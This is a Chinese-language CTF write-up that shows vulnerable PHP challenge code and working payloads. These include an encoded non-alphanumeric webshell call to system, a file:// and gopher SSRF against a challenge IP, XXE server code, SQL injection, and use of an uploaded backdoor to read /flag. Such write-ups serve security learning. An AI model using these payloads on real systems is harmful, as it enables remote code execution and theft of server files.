Web
hate-php
源碼如下:
<?php
error_reporting(0);
if(!isset($_GET['code'])){
highlight_file(__FILE__);
}else{
$code = $_GET['code'];
if (preg_match('/(f|l|a|g|\.|p|h|\/|;|\"|\'|\`|\||\[|\]|\_|=)/i',$code)) {
die('You are too good for me');
}
$blacklist = get_defined_functions()['internal'];
foreach ($blacklist as $blackitem) {
if (preg_match ('/' . $blackitem . '/im', $code)) {
die('You deserve better');
}
}
assert($code);
}
?>
無字母webshell,異或一下即可。
先構造phpinfo看disable_function禁用了哪些函數:
?code=(~(%8F%97%8F%96%91%99%90))()
沒有禁用就直接構造system函數,執行命令讀取flag
payload:?code=(~(%8C%86%8C%8B%9A%92))(~(%9C%9E%8B%DF%99%93%9E%98%D1%8F%97%8F))
然後F12即可得到flag
do you know
<?php
highlight_file(__FILE__);
#there is xxe.php
$poc=$_SERVER['QUERY_STRING'];
if(preg_match("/log|flag|hist|dict|etc|file|write/i" ,$poc)){
die("no hacker");
}
$ids=explode('&',$poc);
$a_key=explode('=',$ids[0])[0];
$b_key=explode('=',$ids[1])[0];
$a_value=explode('=',$ids[0])[1];
$b_value=explode('=',$ids[1])[1];
if(!$a_key||!$b_key||!$a_value||!$b_value)
{
die('我什麼都沒有~');
}
if($a_key==$b_key)
{
die("trick");
}
if($a_value!==$b_value)
{
if(count($_GET)!=1)
{
die('be it so');
}
}
foreach($_GET as $key=>$value)
{
$url=$value;
}
$ch = curl_init();
if ($type != 'file') {
#add_debug_log($param, 'post_data');
// 設置超時
curl_setopt($ch, CURLOPT_TIMEOUT, 30);
} else {
// 設置超時
curl_setopt($ch, CURLOPT_TIMEOUT, 180);
}
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
// 設置header
if ($type == 'file') {
$header[] = "content-type: multipart/form-data; charset=UTF-8";
curl_setopt($ch, CURLOPT_HTTPHEADER, $header);
} elseif ($type == 'xml') {
curl_setopt($ch, CURLOPT_HEADER, false);
} elseif ($has_json) {
$header[] = "content-type: application/json; charset=UTF-8";
curl_setopt($ch, CURLOPT_HTTPHEADER, $header);
}
// curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_AUTOREFERER, 1);
// dump($param);
curl_setopt($ch, CURLOPT_POSTFIELDS, $param);
// 要求結果爲字符串且輸出到屏幕上
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
// 使用證書:cert 與 key 分別屬於兩個.pem文件
$res = curl_exec($ch);
var_dump($res);
?>
NU1L的師傅們直接用file文件協議讀取加URL編碼繞過就過了:http://121.36.64.91/index.php?a=%66%69%6c%65:///var/www/html/%66%6c%61%67.php&b=%66%69%6c%65:///var/www/html/%6 6%6c%61%67.php
我是用gopher打過去的,讀取了xxe.php,然後就卡住了
?a=gopher://127.0.0.1:80/_POST%2520/xxe.php%2520HTTP/1.1%250D%250AHost%253A%2520127.0.0.1%250D%250AContent-Type%253A%2520application/x-www-form-urlencoded%250D%250AContent-Length%253A%25209%250D%250A%250D%250Adata%253D1111&b=gopher://127.0.0.1:80/_POST%2520/xxe.php%2520HTTP/1.1%250D%250AHost%253A%2520127.0.0.1%250D%250AContent-Type%253A%2520application/x-www-form-urlencoded%250D%250AContent-Length%253A%25209%250D%250A%250D%250Adata%253D1111
xxe.php源碼如下:
<?php
highlight_file(__FILE__);
#這題在上午的時候爲了防止有人用webshell掃描器d,有一段時間臨時過濾了system關鍵字,但是這個關鍵字在解題中是用不到的,所以才過濾它,給選手造成的不便請您諒解
#這題和命令執行無關,請勿嘗試
#there is main.php and hints.php
if($_SERVER["REMOTE_ADDR"] !== "127.0.0.1"){
die('show me your identify');
}
libxml_disable_entity_loader(false);
$data = isset($_POST['data'])?trim($_POST['data']):'';
$data = preg_replace("/file|flag|write|xxe|test|rot13|utf|print|quoted|read|string|ASCII|ISO|CP1256|cs_CZ|en_AU|dtd|mcrypt|zlib/i",'',$data);
$resp = '';
if($data != false){
$dom = new DOMDocument();
$dom->loadXML($data, LIBXML_NOENT);
ob_start();
var_dump($dom);
$resp = ob_get_contents();
ob_end_clean();
}
?>
<style>
div.main{
width:90%;
max-width:50em;
margin:0 auto;
}
textarea{
width:100%;
height:10em;
}
input[type="submit"]{
margin: 1em 0;
}
</style>
<div class="main">
<form action="" method="POST">
<textarea name="data">
<?php
echo ($data!=false)?htmlspecialchars($data):htmlspecialchars('');
?>
</textarea><br/>
<input style="" type="submit" value="submit"/>
<a target="_blank" href="<?php echo basename(__FILE__).'?s';?>">View Source Code</a>
</form>
<pre>
<?php echo htmlspecialchars($resp);?>
</pre>
</div>
美團外賣
www.zip源碼泄露:
代碼審計後嗎,發現daochu.php
存在注入:
lib/webuploader/0.1.5/server/preview.php
處存在文件寫入:
但訪問lib/webuploader/0.1.5/server/preview.php
處顯示404,先進行注入,最簡單的聯合查詢注入:
得到提示:see_the_dir_956c110ef9decdd920249f5fed9e4427
訪問目錄發現似乎和原來是一樣的,試試剛剛的lib/webuploader/0.1.5/server/preview.php
,成功訪問
利用Data URI scheme傳入一個php命令來執行,得到一個文件
訪問後發現是後門,get傳入file參數即可得到flag。
payload:956c110ef9decdd920249f5fed9e4427/lib/webuploader/0.1.5/server/e98a4571cf72b798077d12d6c94629.php?file=/flag
Misc
loop
linux下利用py腳本重複執行unzip命令解壓即可。